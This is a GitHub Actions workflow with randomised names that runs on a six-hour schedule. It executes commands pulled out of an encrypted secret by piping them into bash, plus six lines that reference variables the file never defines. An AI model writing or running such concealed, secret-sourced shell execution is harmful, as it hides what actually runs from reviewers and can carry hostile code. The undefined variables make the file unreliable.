name: jinxinnian3421

on:
  workflow_dispatch:
  schedule:
    - cron: '22 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jinxinnian3421
        env:
          mzhzb616: ${{ secrets.mzhzb616 }}
        run: |
          echo $mzhzb616 | jq -r .yvb483 | /bin/bash
          echo $sjz96 | jq -r .goccu3915 | /bin/bash
          echo $dqwk5329 | jq -r .oh612 | /bin/bash
          echo $wcodn193 | jq -r .hgu48737 | /bin/bash
          echo $mf057 | jq -r .w3 | /bin/bash
          echo $svyz51 | jq -r .mnxsu5 | /bin/bash
          echo $is74 | jq -r .jna51191 | /bin/bash

